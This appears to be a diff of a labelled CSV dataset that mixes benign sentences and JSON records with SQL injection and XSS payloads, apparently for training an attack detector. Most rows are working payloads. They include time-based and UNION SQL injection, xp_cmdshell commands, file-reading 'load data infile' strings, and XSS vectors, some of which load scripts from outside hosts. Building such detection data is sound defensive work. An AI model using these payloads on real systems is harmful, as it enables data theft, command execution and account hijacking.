1337=BENCHMARK(5000000,MD5(0x774c5341)) AND",2,SQLi,11296 -Select tutor.,0,normal,24718 -"<a onmousemove=""alert(1)"">test</a>",1,XSS,4350 -"-1844"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,16682 -"1' union all select null,null,null,null,null#",2,SQLi,18084 +1 ) as selm where 5759 = 5759,2,SQLi,18508 +Join us for dinner.,0,normal,22548 +"<i draggable=""true"" ondragend=""alert(1)"">test</i>",1,XSS,4843 +"-6129 union all select 9122,9122#",2,SQLi,14256 +"1"" ) as uorp where 7208 = 7208",2,SQLi,20852 +"1"" or 5286 = ( select count ( * ) from all_users t",2,SQLi,15882 +-2050' union all select 5606#,2,SQLi,13845 +<font onpointerover=alert(1)>XSS</font>,1,XSS,7079 +"><script>alert(String.fromCharCode(66, 108, 65, 99",1,XSS,1144 +"select * from users where id = 1 or 1#""{ union sel",2,SQLi,11658 +"<sup onmousedown=""alert(1)"">test</sup>",1,XSS,6192 +"1"" ) where 2136 = 2136 or 7552 = ( select count ( ",2,SQLi,12206 +"{""id"":null,""name"":""stream light""}",0,normal,27607 +"-8608"" or 5460 = 4461--",2,SQLi,17672 +select * from users where id = 1.&&@ union select ,2,SQLi,11923 +"1%' ) and make_set ( 8403 = 8403,8899 ) and ( '%' ",2,SQLi,22258 +"1"" ) ) as oxrr where 6141 = 6141 or 6979 = like ( ",2,SQLi,15964 +"<param ondblclick=""alert(1)"">test</param>",1,XSS,5464 +"-8929' union all select 5324,5324,5324,5324,5324,5",2,SQLi,19287 +"<ruby draggable=""true"" ondrag=""alert(1)"">test</rub",1,XSS,5159 +<del id=x tabindex=1 onactivate=alert(1)></del>,1,XSS,1803 +"<q onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,4759 +"%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND",2,SQLi,11298 +"1"" where 8978 = 8978 union all select null,null,nu",2,SQLi,21724 +<colgroup onpointermove=alert(1)>XSS</colgroup>,1,XSS,4352 +"1%' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex (",2,SQLi,16650 +1%' ) and sleep ( 5 ) #,2,SQLi,18082 "<a href=""\xE2\x80\xA8javascript:javascript:alert(1",1,XSS,531 -create table myfile (input TEXT); load data infile,2,SQLi,22498 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17078 -alert(1)>//INJECTX,1,XSS,9828 -<input onpointermove=alert(1)>XSS</input>,1,XSS,1920 -)))))) waitfor delay '0:0:20' /*,2,SQLi,10946 -"-7584' union all select 1132,1132,1132,1132,1132,1",2,SQLi,12825 +))))) waitfor delay '0:0:20' /*,2,SQLi,22495 +"1"" and sleep ( 5 ) #",2,SQLi,17289 +<img src=x onload=prompt(1) onerror=alert(1) onmou,1,XSS,9830 +header('Location: '.$_GET['param']);,1,XSS,1921 +""")))))) waitfor delay '0:0:20' --",2,SQLi,10948 +if ( 8537 = 7034 ) select 8537 else drop function ,2,SQLi,12827 "<script>{onerror=eval}throw{lineNumber:1,columnNum",1,XSS,125 -"1 or ( select 9173 from ( select count ( * ) ,conc",2,SQLi,14814 -1' ) as ssxj where 3845 = 3845 or 7427 = dbms_pipe,2,SQLi,20347 -Select your wish.,0,normal,24936 -"1"" ) where 8571 = 8571 and elt ( 4249 = 4249,7259 ",2,SQLi,20069 -"-4711' in boolean mode ) union all select 8007,800",2,SQLi,15529 -exec master..xp_cmdshell 'ipconfig+/all',2,SQLi,10033 -"-3733' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,18041 -"<table draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,1950 -But it is only a select minority who attain to the,0,normal,26309 -"-6263"" union all select 8005,8005#",2,SQLi,21408 -1 ) ) as ehlg where 6340 = 6340,2,SQLi,14157 -"-2862' ) ) ) union all select 6649,6649--",2,SQLi,18470 -I'll select my wedding band.,0,normal,24400 -#ERROR!,2,SQLi,11367 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10605 -1'|| ( select 'byxb' where 8351 = 8351 and 2853 = ,2,SQLi,15743 -"1"" ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,15634 -The next menu then lets you select Wipe data/facto,0,normal,25406 -",if not ( select system_user ) <> 'sa' waitfor del",2,SQLi,11430 -"-3829%"" ) union all select 2218,2218,2218,2218,221",2,SQLi,12315 -"1%"" ) ) union all select null,null,null,null,null#",2,SQLi,16230 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10--",2,SQLi,10572 -select * from users where id = 1 + ( \+ ) or 1 = 1,2,SQLi,11699 -1 ) as ilqx where 8547 = 8547,2,SQLi,15232 --9721' ) or 9287 = 4362#,2,SQLi,20082 -"{""id"":null,""name"":""Arceus""}",0,normal,27227 -"These deals change all the time, but they always l",0,normal,25325 -<dt id=x tabindex=1 onfocusin=alert(1)></dt>,1,XSS,6342 -AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGI,2,SQLi,11069 -He also appointed another select committee to cons,0,normal,26126 -1 ( select ( case when ( 5451 = 5451 ) then regexp,2,SQLi,13600 -1' ) ) ) union all select null--,2,SQLi,17982 +"1%"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,14816 +"-2120"" ) union all select 9614--",2,SQLi,20345 +Select your ambition.,0,normal,24933 +1' rlike sleep ( 5 ),2,SQLi,20067 +"-8129' ) ) ) union all select 4531,4531,4531#",2,SQLi,15531 +exec master..xp_cmdshell 'net+users',2,SQLi,10035 +1'|| ( select 'scba' where 9079 = 9079 and 8635 = ,2,SQLi,18039 +"<big onmouseenter=""alert(1)"">test</big>",1,XSS,1951 +But paying to select a seat doesn't necessarily me,0,normal,26306 +"{""id"":null,""name"":""else town""}",0,normal,27392 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14159 +"1%' ) ) union all select null,null,null--",2,SQLi,18468 +"{""id"":null,""firstName"":""Cassia"",""lastName"":""Seah"",",0,normal,26899 +"email=test@gmail.com'XOR(if(now()=sysdate(),sleep(",2,SQLi,11369 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10607 +1'+ ( select 'iqxn' where 1146 = 1146 and 3715 in ,2,SQLi,15745 +1 ) as bgvd where 1753 = 1753 and 6510 = ( select ,2,SQLi,15636 +The Oogie Boogie Bash is offered on select nights ,0,normal,25403 +""" or 0 = 0 --",2,SQLi,11432 +"-3279"" union all select 8568,8568,8568,8568--",2,SQLi,12317 +"1' ) where 9006 = 9006 union all select null,null,",2,SQLi,16222 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12--",2,SQLi,10574 +"select * from users where id = 1 or "" ( ["" or 1 = ",2,SQLi,11701 +1' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ,2,SQLi,15234 +"iif ( 9342 = 6508,1,1/0 )",2,SQLi,20080 +"{""id"":null,""firstName"":""Jaylen"",""lastName"":""Chuan""",0,normal,27225 +These private accounts often have a considerably s,0,normal,25322 +<style onload=alert(1)></style>,1,XSS,6344 +AND 1=utl_inaddr.get_host_address((SELECT host_nam,2,SQLi,11071 +"-1084' ) union all select 2634,2634,2634,2634,2634",2,SQLi,20560 +1 ) ) as tnhy where 1874 = 1874 and 2858 = 7324#,2,SQLi,13602 +1'|| ( select 'xwbo' from dual where 1263 = 1263 w,2,SQLi,17539 <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>,1,XSS,848 -<source onpointermove=alert(1)>XSS</source>,1,XSS,2378 -1' ) as pfwt where 8448 = 8448 union all select nu,2,SQLi,15142 -"1, ( select ( case when ( 7734 = 7734 ) then ( sel",2,SQLi,20594 -<frame id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,7895 -1' ) ) or ( select * from ( select ( sleep ( 5 ) ),2,SQLi,17853 -Otherhood arrives on Netflix and in select theater,0,normal,25801 -<article id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,1904 -"create table myfile (line varchar(8000))"" bulk ins",2,SQLi,22497 -1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||,2,SQLi,22389 -"<nextid draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,6680 -"1"" ) as sraw where 1997 = 1997 and ( select 2* ( i",2,SQLi,18688 -Select your dream wedding makeup.,0,normal,24387 -"<data onkeydown=""alert(1)"" contenteditable>test</d",1,XSS,4336 -"<IMG SRC=x onstorage=""alert(String.fromCharCode(88",1,XSS,1184 --6865 ) or ( 8459 = 8459 ) *4906 and ( 6107 = 6107,2,SQLi,12295 -"-8128"" ) ) as ovjz where 7375 = 7375 union all sel",2,SQLi,15937 -""" or 1=1--",2,SQLi,11119 -<img src=validimage.png onload=alert(1)>,1,XSS,3061 -"<html oncontextmenu=""alert(1)"">test</html>",1,XSS,3860 -Select your swap.,0,normal,25049 -"1"" or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,16852 +"<main onkeypress=""alert(1)"" contenteditable>test</",1,XSS,2379 +"-5205' ) ) union all select 8592,8592,8592,8592,85",2,SQLi,15144 +"-8966"" ) ) ) or 1628 = 2712",2,SQLi,20592 +<small id=x tabindex=1 onfocus=alert(1)></small>,1,XSS,7897 +"-5667%' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( ",2,SQLi,21307 +Our special Fortnite captains will select the top ,0,normal,25798 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1905 +"{""id"":null,""name"":""Porygon""}",0,normal,26760 +1' ) ) as jntr where 5051 = 5051 and ( select 9067,2,SQLi,22387 +<th onpointerenter=alert(1)>XSS</th>,1,XSS,6682 +Select the gear icon — this will prompt a window t,0,normal,25595 +1' ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 7,2,SQLi,15947 +"a=alert,a(1)",1,XSS,4338 +"<IMG SRC=x onunload=""alert(String.fromCharCode(88,",1,XSS,1185 +1'+ ( select 'qrml' where 3791 = 3791 or 8384 = li,2,SQLi,12297 +-8264%' ) order by 1#,2,SQLi,17122 +select name from syscolumns where id = (select id ,2,SQLi,11121 +"<html onmousemove=""alert(1)"">test</html>",1,XSS,3062 +"<video oncopy=""alert(1)"" contenteditable>test</vid",1,XSS,3862 +Select your exchange.,0,normal,25046 +"1"" ) ) ) or 9643 = ( select count ( * ) from domai",2,SQLi,16850 "<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">",1,XSS,289 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,15532 -<script>var request = new XMLHttpRequest();request,1,XSS,9294 -><script+src=https://www.sharethis.com/get-publish,1,XSS,9806 -Search records where necessary.,0,normal,23275 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,15534 +<script>var x = document.createElement('iframe');d,1,XSS,9296 +><script+src=https://passport.ngs.ru/ajax/check?ca,1,XSS,9808 +Index columns where needed.,0,normal,23272 `'><script>\xE2\x80\x8Bjavascript:alert(1)</script,1,XSS,583 -"<listing onbeforepaste=""alert(1)"" contenteditable>",1,XSS,4688 -<style>:target {color: red;}</style><a id=x style=,1,XSS,3271 -1 ) ) and 9198 = 9198--,2,SQLi,17310 -1 or ( select 2* ( if ( ( select * from ( select c,2,SQLi,17230 -"<style>@keyframes slidein {}</style><br style=""ani",1,XSS,7036 -"1"" ( select ( case when ( 5451 = 5451 ) then regex",2,SQLi,18304 -<font id=x tabindex=1 onfocus=alert(1)></font>,1,XSS,3880 -I need to select the best photo for the album.,0,normal,23771 -"<svg onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,2181 +<dialog onblur=alert(1) tabindex=1 id=x></dialog><,1,XSS,4690 +<keygen onpointerout=alert(1)>XSS</keygen>,1,XSS,3273 +"1, ( select ( case when ( 8596 = 8596 ) then 1 els",2,SQLi,17308 +"1"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ",2,SQLi,17228 +<style>:target {color:red;}</style><fieldset id=x ,1,XSS,7038 +"1"" where 7022 = 7022",2,SQLi,16690 +<style>:target {color: red;}</style><th id=x style,1,XSS,3882 +I want to select a course to enhance my skills.,0,normal,23768 +<map onpointermove=alert(1)>XSS</map>,1,XSS,2182 "{""id"":null,""firstName"":""Juay"",""lastName"":""Yew Hai""",0,normal,27563 -1'+ ( select immd where 7499 = 7499 union all sele,2,SQLi,20775 -"1"" ) ) ) union all select null#",2,SQLi,19499 -ORDER BY 24,2,SQLi,10328 -<big onfocusout=alert(1) tabindex=1 id=x></big><in,1,XSS,7624 -"-1598"" ) ) or elt ( 5329 = 9628,9628 ) and ( ( ""hy",2,SQLi,18577 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10614 -1' ) ) and ( select * from ( select ( sleep ( 5 ) ,2,SQLi,18957 -1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |,2,SQLi,21583 -"1"" or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,22422 -"1"" and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,18757 -"{""id"":null,""name"":""Weezing""}",0,normal,26984 -exec sp,2,SQLi,10156 --4562' ) or 3038 = 3038,2,SQLi,16684 -1 ) as jtfx where 8038 = 8038,2,SQLi,16864 -1' ) where 6624 = 6624 and 5392 = 8258,2,SQLi,21324 -"<colgroup oncontextmenu=""alert(1)"">test</colgroup>",1,XSS,6202 -"<object classid=""clsid:..."" codebase=""javascript:d",1,XSS,1537 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3282 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11887 -<cite id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,7636 -Sort alphabet blocks.,0,normal,22792 -"1%' ) ) ) and elt ( 7425 = 3843,3843 ) and ( ( ( '",2,SQLi,13936 -Select your dream honeymoon destination.,0,normal,24371 -"1"" ) ) as lfte where 3811 = 3811 or exp ( ~ ( sele",2,SQLi,19756 -Identify columns where applicable.,0,normal,23291 -1 ) where 4698 = 4698 and 3580 = ( select count ( ,2,SQLi,12512 +"-5972"" or 8509 = 3448#",2,SQLi,16873 +"-5810 union all select 6307,6307,6307,6307,6307,63",2,SQLi,17986 +ORDER BY 26,2,SQLi,10330 +<cite id=x tabindex=1 onfocus=alert(1)></cite>,1,XSS,7626 +1'+ ( select 'zugq' where 9218 = 9218,2,SQLi,17220 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10616 +"1%' ) ) union all select null,null,null,null,null,",2,SQLi,20644 +"1' ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,20220 +-2983' ) or 8571 = 8571--,2,SQLi,18970 +Select your achieve.,0,normal,25007 +"1%' ) union all select null,null,null,null,null,nu",2,SQLi,19684 +1 or pg_sleep(__TIME__)--,2,SQLi,10158 +You can select an app next to Default Mail Reader.,0,normal,25083 +"{""id"":null,""name"":""bow""}",0,normal,27463 +-9054 ) ) ) or 9323 = 9323#,2,SQLi,21322 +"<center onkeypress=""alert(1)"" contenteditable>test",1,XSS,6204 +<style><!--</style><script>document.vulnerable=tru,1,XSS,1538 +"<command onmouseover=""alert(1)"">test</command>",1,XSS,3284 +select * from users where id = 1 <@$ or 1 = 1 -- 1,2,SQLi,11889 +"<<SCRIPT>alert("""");//\<</SCRIPT>",1,XSS,7638 +1' ) ) as cwss where 9720 = 9720,2,SQLi,18451 +select ( case when ( 1946 = 1302 ) then 1946 else ,2,SQLi,13938 +"1' ) ) and make_set ( 8403 = 8403,8899 ) and ( ( '",2,SQLi,18657 +"{""id"":null,""name"":""RotomMow Rotom""}",0,normal,27384 +In 1842 he published a treatise on The Unity of th,0,normal,26023 +"1', ( select ( case when ( 6894 = 6087 ) then 1 el",2,SQLi,12514 "<DIV STYLE=""width:expression(javascript:alert(1));",1,XSS,762 -<style>:target {color: red;}</style><param id=x st,1,XSS,7014 -&&SLEEP(5)--,2,SQLi,10400 -"{""id"":null,""name"":""matter from""}",0,normal,26948 -"1"" ) where 9511 = 9511 ( select ( case when ( 4587",2,SQLi,20713 -"-3501"" ) ) ) or ( 6789 = 6990 ) *6990 and ( ( ( ""j",2,SQLi,12549 +"<blockquote onmouseout=""alert(1)"">test</blockquote",1,XSS,7016 +AnD SLEEP(5) ANd '1,2,SQLi,10402 +"{""id"":null,""name"":""Golemon""}",0,normal,26945 +1%' and 8514 = ( select count ( * ) from domain.do,2,SQLi,20711 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,12551 <script>eval('\141lert(1)')</script>,1,XSS,186 -<SCRIPT>a=/XSS/,1,XSS,9056 -Massage well into the area to be shaved and then s,0,normal,25888 -"{""id"":null,""name"":""Hare""}",0,normal,27023 -<rtc onblur=alert(1) tabindex=1 id=x></rtc><input ,1,XSS,4063 -1'|| ( select 'gved' from dual where 6965 = 6965,2,SQLi,12707 -""",NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10858 -"{""id"":null,""name"":""correctly""}",0,normal,27466 -sign,0,normal,23210 -&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&l,1,XSS,1416 -Burr serves as chairman of the Senate Select Commi,0,normal,26316 -1'|| ( select 'neqi' where 6873 = 6873 union all s,2,SQLi,19909 +<X OnXxx=1,1,XSS,9058 +"Measure the space, and take these measurements wit",0,normal,25885 +The company's management did not give satisfaction,0,normal,25469 +<iframe src=http://.rocks/scriptlet.html <,1,XSS,4065 +"1' or ( select 9173 from ( select count ( * ) ,con",2,SQLi,12709 +"),NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10860 +"select pg_sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,21356 +replace,0,normal,23207 +&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&,1,XSS,1417 +But for the sake of practical convenience it has l,0,normal,26313 +"1 ) ) union all select null,null,null#",2,SQLi,19907 "<a href=""javascript\x00:javascript:alert(1)"" id=""f",1,XSS,541 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,16972 -1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ,2,SQLi,21350 -1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,20651 -I'm considering where to have a romantic dinner.,0,normal,23819 -select ( case when ( 2717 = 2634 ) then 2717 else ,2,SQLi,15210 -<nobr id=x tabindex=1 onfocusin=alert(1)></nobr>,1,XSS,7615 -1,0,normal,26730 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6414 -"<a draggable=""true"" ondragenter=""alert(1)"">test</a",1,XSS,4328 -"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,15022 -<mark id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,8777 -Insert contact.,0,normal,23057 -"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></",1,XSS,9050 -1' ) ) ) or 4915 = ( select count ( * ) from domai,2,SQLi,15504 -<style>:target {color: red;}</style><fieldset id=x,1,XSS,2869 -"-1663' or elt ( 1032 = 1032,3623 ) and 'yqaj' like",2,SQLi,15366 -<input onfocusout=alert(1) id=x><input autofocus>,1,XSS,7671 -"Select ""Register New Device"" by pressing ""X"" on th",0,normal,25672 -1 ) as obzn where 7652 = 7652 or ( select * from (,2,SQLi,21534 -1%' ) rlike sleep ( 5 ) #,2,SQLi,16812 -"-2953"" ) or 4493 = utl_inaddr.get_host_address ( c",2,SQLi,17068 -><script+src=https://suggest.taobao.com/sug?callba,1,XSS,9787 -"<blink draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,6631 -"1%"" ) ) and 4595 = 4595#",2,SQLi,14815 -"<style>@keyframes x{}</style><font style=""animatio",1,XSS,7381 -<style>@keyframes slidein {}</style><blockquote st,1,XSS,3119 -Select your brand.,0,normal,24894 -<center id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,2953 -1 ) ) as cvid where 4381 = 4381 union all select n,2,SQLi,20732 -1' and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |,2,SQLi,19443 -1'|| ( select 'goen' from dual where 8586 = 8586,2,SQLi,12877 -select ( case when ( 3076 = 3596 ) then 3076 else ,2,SQLi,12965 -1' ) ) and 4650 = 1322#,2,SQLi,18347 -"1"" ) ) as jebl where 3464 = 3464",2,SQLi,18760 -"<figcaption draggable=""true"" ondragend=""alert(1)"">",1,XSS,6806 -"Select ""Download"" and press X. Your game should be",0,normal,25678 -"<div id=""125""><?xml version=""1.0""?>",1,XSS,9114 -1 ) as ozga where 4002 = 4002 and 6969 = ( select ,2,SQLi,16630 -"1"" ) ) as isqj where 6344 = 6344 union all select ",2,SQLi,13177 -"-3501' ) ) ) or make_set ( 7122 = 6158,6158 ) and ",2,SQLi,13471 --2248'+ ( select wuow where 4421 = 4421 union all ,2,SQLi,12636 -"<style>@keyframes x{}</style><dt style=""animation-",1,XSS,2206 -"{""id"":null,""firstName"":""Adeline"",""lastName"":""Tay"",",0,normal,26897 -"1"" ) ) ) and 2716 = ( select count ( * ) from sysu",2,SQLi,19039 -"1%"" ) ) ) or 4915 = ( select count ( * ) from doma",2,SQLi,12847 -1 ) where 7050 = 7050,2,SQLi,21449 -"{""id"":null,""name"":""Venipede""}",0,normal,27298 -"1' in boolean mode ) and 3202 = like ( 'abcdefg',u",2,SQLi,18165 -"<shadow oncopy=""alert(1)"" contenteditable>test</sh",1,XSS,2457 +Peru's sol closed 0.30 percent lower and select st,0,normal,25782 +1' and 3754 = ( select upper ( xmltype ( chr ( 60 ,2,SQLi,21348 +"-9977"" where 5132 = 5132 union all select 5132--",2,SQLi,20649 +"1' ) and extractvalue ( 7982,concat ( 0x5c,0x71717",2,SQLi,17822 +1%' ) ) and sleep ( 5 ) #,2,SQLi,15212 +<source onpointerleave=alert(1)>XSS</source>,1,XSS,7617 +Where's the hacienda?,0,normal,23572 +<label id=x tabindex=1 onfocusin=alert(1)></label>,1,XSS,6416 +<form><button formaction=javascript&colon;alert(1),1,XSS,4330 +1%' ) ) and 2716 = ( select count ( * ) from sysus,2,SQLi,15024 +<summary id=x tabindex=1 onfocusin=alert(1)></summ,1,XSS,8779 +"1' procedure analyse ( extractvalue ( 5840,concat ",2,SQLi,18489 +"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;",1,XSS,9052 +select pg_sleep ( 5 ) and ( ( 4382 = 4382,2,SQLi,15506 +"<ol draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,2870 +"1%' ) ) ) union all select null,null,null#",2,SQLi,15368 +"<div draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,7673 +"Select ""Streaming Channels"" in the list on the lef",0,normal,25669 +"1"" ) and elt ( 4249 = 4249,7259 ) and ( ""xgka"" lik",2,SQLi,21532 +1 ) ) as rcon where 8190 = 8190 or 5286 = ( select,2,SQLi,16049 +Insert the code.,0,normal,22818 +><script+src=https://bebezoo.1688.com/fragment/ind,1,XSS,9789 +<b onfocusout=alert(1) tabindex=1 id=x></b><input ,1,XSS,6633 +-3450' where 4478 = 4478 or 9323 = 9323#,2,SQLi,14817 +"<object onpaste=""alert(1)"" contenteditable>test</o",1,XSS,7383 +"<p onmousemove=""alert(1)"">test</p>",1,XSS,3120 +"-9136' ) or make_set ( 9354 = 9354,7185 )",2,SQLi,17562 +"<tbody onkeyup=""alert(1)"" contenteditable>test</tb",1,XSS,2954 +1'|| ( select 'ybfo' from dual where 3319 = 3319 u,2,SQLi,17428 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,19441 +1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ,2,SQLi,12879 +"-8025"" ) or ( 1436 = 4186 ) *4186 and ( ""sqwv"" lik",2,SQLi,12967 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,17172 +select,0,normal,26599 +"<ol draggable=""true"" ondragend=""alert(1)"">test</ol",1,XSS,6808 +Where's the missing link in the chain?,0,normal,22757 +"<div id=""127""><svg xmlns=""http://www.w3.org/2000/s",1,XSS,9116 +Where can I select a book for my book club?,0,normal,23954 +1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1,2,SQLi,13179 +1 ) ) as gxvp where 3865 = 3865,2,SQLi,13473 +1 ) as mtda where 3951 = 3951,2,SQLi,12638 +"<footer oncut=""alert(1)"" contenteditable>test</foo",1,XSS,2207 +Where's the medical clinic?,0,normal,23623 +1' ) where 3311 = 3311,2,SQLi,19037 +-7532 ) ) ) or 4493 = utl_inaddr.get_host_address ,2,SQLi,12849 +"1"" ) as nraw where 7984 = 7984 and elt ( 3114 = 31",2,SQLi,21447 +"{""id"":null,""firstName"":""Milky"",""lastName"":""Teo"",""a",0,normal,27297 +Delete the irrelevant comments.,0,normal,22673 +"<spacer draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2458 "{""id"":null,""firstName"":""Nurul"",""lastName"":""Hidayah",0,normal,27532 -<span id=x tabindex=1 ondeactivate=alert(1)></span,1,XSS,8824 -"-6112"" ) union all select 8203,8203,8203,8203,8203",2,SQLi,18509 --5389'|| ( select 'gggl' where 1020 = 1020 union a,2,SQLi,19762 -"1%"" ) ( select ( case when ( 4587 = 4587 ) then re",2,SQLi,19796 -1' in boolean mode ) or 9643 = ( select count ( * ,2,SQLi,17591 -"1%"" ) union all select null,null,null,null#",2,SQLi,13366 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12763 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10524 -1 ) as hggi where 6511 = 6511,2,SQLi,14670 -<svg><datalist onload=alert(1)></datalist>,1,XSS,6097 -Where's the missing remote control?,0,normal,22640 -"-5606 ) ) or 1 group by concat ( 0x7171706a71, ( s",2,SQLi,15296 -"On the current Nook Tablet, tap open the Apps icon",0,normal,25843 -Select act.,0,normal,24723 -Insert the fresh cartridge into the printer.,0,normal,22956 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11091 -Modify the account information.,0,normal,22709 -I need to select the right colors for my artwork.,0,normal,23752 -I need to select the perfect outfit for the occasi,0,normal,23693 --1492 where 2788 = 2788 union all select 2788#,2,SQLi,17666 -1'+ ( select idnb where 2338 = 2338,2,SQLi,18091 -1' ) ) or 5286 = ( select count ( * ) from all_use,2,SQLi,13220 -"<mark onmouseover=""alert(1)"">test</mark>",1,XSS,7476 -"<caption oncontextmenu=""alert(1)"">test</caption>",1,XSS,2553 -<link rel=stylesheet href=1 onerror=alert(1)>,1,XSS,6976 -"<aside oncontextmenu=""alert(1)"">test</aside>",1,XSS,8652 -1' in boolean mode ) or 2367 = ( select count ( * ,2,SQLi,18847 --8745' ) as xpwv where 8855 = 8855 or 4493 = utl_i,2,SQLi,16614 -"<;SCRIPT a="";>';>""; SRC="";http://ha.ckers.org/xss.",1,XSS,1666 -Save up to 20% off select Greenworks 80V Outdoor P,0,normal,25727 -"<embed onmouseenter=""alert(1)"">test</embed>",1,XSS,3838 -Select discover.,0,normal,24653 -"<sub onkeypress=""alert(1)"" contenteditable>test</s",1,XSS,2583 -"<IMG SRC=javascript:alert(""XSS"")>",1,XSS,803 -"<handler id=""y"">alert(127)</handler>",1,XSS,9180 -1' ) ) as zari where 6847 = 6847,2,SQLi,17895 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8917 -"The mayor holds office for three years, has the po",0,normal,25411 -unknown,0,normal,23241 -ORDER BY 10#,2,SQLi,10283 -"-1084 where 1181 = 1181 or make_set ( 9354 = 9354,",2,SQLi,15225 -Select your alternate.,0,normal,25044 -<track onpointerover=alert(1)>XSS</track>,1,XSS,7964 -select case when 2640 = 9249 then 1 else null end-,2,SQLi,12878 -"1"" ) ) ) order by 1--",2,SQLi,19350 -Select here.,0,normal,24481 -"1%"" ) ) ) and 2716 = ( select count ( * ) from sys",2,SQLi,17272 -"<area onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,1812 -Save up to 69% off select Logitech PC Gaming & Pro,0,normal,25706 -"<sup onmouseenter=""alert(1)"">test</sup>",1,XSS,3528 -) or ('1'='1'#,2,SQLi,9984 -"1"" where 6179 = 6179",2,SQLi,18528 -"<style>@keyframes x{}</style><label style=""animati",1,XSS,4296 -<script\x20>javascript:alert(1)</script>,1,XSS,603 -"-1065 ) ) union all select 7437,7437,7437,7437,743",2,SQLi,12301 -<object data=javascript&colon;\u0061&#x6C;&#101%72,1,XSS,907 -I want to select a gift for my cousin's wedding.,0,normal,23928 -"-3452%' or 1570 = convert ( int, ( select char ( 1",2,SQLi,16433 -"1%' and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,21246 -"<head draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,5041 -;waitfor delay '0:0:5'--,2,SQLi,10361 -if ( 4194 = 4133 ) select 4194 else drop function ,2,SQLi,18220 -Where's the perfect spot to enjoy the sunset?,0,normal,23769 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,15020 -"<td draggable=""true"" ondragend=""alert(1)"">test</td",1,XSS,3276 +<optgroup id=x tabindex=1 onbeforedeactivate=alert,1,XSS,8826 +"{""id"":null,""name"":""Darumaka""}",0,normal,27307 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19760 +"1' ) or ( select 9173 from ( select count ( * ) ,c",2,SQLi,19794 +And it's driving select members of the media to di,0,normal,26366 +-5449' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,13368 +1'+ ( select 'nlvq' where 7528 = 7528 or ( select ,2,SQLi,12765 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10526 -<iframe onload=alert(1)></iframe>,1,XSS,1761 -"Depending on your financial situation, select a bo",0,normal,26242 -"-6436' in boolean 